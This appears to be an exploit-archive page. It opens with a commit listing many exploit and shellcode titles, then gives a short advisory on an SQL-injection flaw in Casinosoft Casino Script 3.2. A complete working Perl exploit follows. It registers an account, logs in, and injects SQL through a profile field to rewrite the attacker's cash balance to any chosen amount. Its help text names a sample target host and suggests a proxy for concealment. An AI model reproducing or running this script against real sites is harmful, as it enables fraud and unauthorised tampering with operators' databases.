880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
104 lines
No EOL
2.7 KiB
Perl
Executable file
104 lines
No EOL
2.7 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/20646/info
|
|
|
|
Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
|
|
|
|
Version 3.2 is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
## Massvet ........ ...... - ......... .......... .......!
|
|
## ........ ...... 3.2, ........ ..... ......, . .......... magicquotes
|
|
## ......... .. ...... 3.2
|
|
##
|
|
## writed bu G1UK
|
|
## CFTeam
|
|
|
|
use LWP::UserAgent;
|
|
use Getopt::Std;
|
|
use HTTP::Cookies;
|
|
|
|
getopts("h:d:l:p:c:x:");
|
|
|
|
$host = $opt_h;
|
|
$dir = $opt_d || '/';
|
|
$login = $opt_l;
|
|
$pass = $opt_p;
|
|
$cash = $opt_c;
|
|
$proxy = $opt_x || '';
|
|
logo();
|
|
|
|
|
|
if(!$host||!$login||!$pass||!$cash) { help(); }
|
|
|
|
print "=) server : $host \r\n";
|
|
print "=) casino dir : $dir \r\n";
|
|
print "=) login : $login \r\n";
|
|
print "=) password : $pass \r\n";
|
|
print "=) cash : $cash \r\n";
|
|
print "\r\n";
|
|
|
|
$cook = LWP::UserAgent->new() or die;
|
|
$cookie = HTTP::Cookies->new();
|
|
$cook->cookie_jar( $cookie );
|
|
$url=$host.''.$dir;
|
|
$cook->proxy('http'=>'http://'.$proxy) if $proxy;
|
|
|
|
printf "Registering =)\r\n";
|
|
$res = $cook->post('http://'.$url.'reg.php',
|
|
[
|
|
"r_login" => "$login",
|
|
"r_pass" => "$pass",
|
|
"r_email" => "1",
|
|
"send" => "1",
|
|
"submit"=> "........."
|
|
]);
|
|
print "Registering OK\r\n";
|
|
|
|
print "Enter =)\r\n";
|
|
$res = $cook->post('http://'.$url.'lobby/login_proc.php',
|
|
[
|
|
"log" => "$login",
|
|
"psw" => "$pass",
|
|
"send" => "1",
|
|
"submit"=> ".....",
|
|
"Cookie" => "PHPSESSID=".$sid
|
|
]);
|
|
print "Enter OK\r\n";
|
|
|
|
print "Edit you cash =))\r\n";
|
|
$res = $cook->post('http://'.$url.'lobby/config.php',
|
|
[
|
|
"cpass" => "$pass",
|
|
"cname" => "",
|
|
"cfam" => "',cash='".$cash."' where login='".$login."'/*",
|
|
"send" => "1",
|
|
"Cookie" => "PHPSESSID=".$sid
|
|
]);
|
|
print "Check out you cash =)\r\n";
|
|
|
|
sub logo()
|
|
{
|
|
print
|
|
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
|
|
print "Massvet internet casino v3.2 sql injection cash exploit by
|
|
CFTeam\r\n";
|
|
print
|
|
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
|
|
}
|
|
|
|
sub help()
|
|
{
|
|
print "CFteam.pl -h <host> -d [dir] -l <login> -p <password> -c <cash>
|
|
-x [proxy]\r\n\r\n";
|
|
print "<host> - Host where cazino installed for example -
|
|
www.massvet.ru\r\n";
|
|
print "[dir] - Directory, where cazino is installed /cazino/ for
|
|
example\r\n";
|
|
print "<login> - User name for registrate \r\n";
|
|
print "<password> - Password for registrate \r\n";
|
|
print "<cash> - How much you need? (00.00)\r\n";
|
|
print "[proxy] - For you safety \r\n";
|
|
exit();
|
|
} |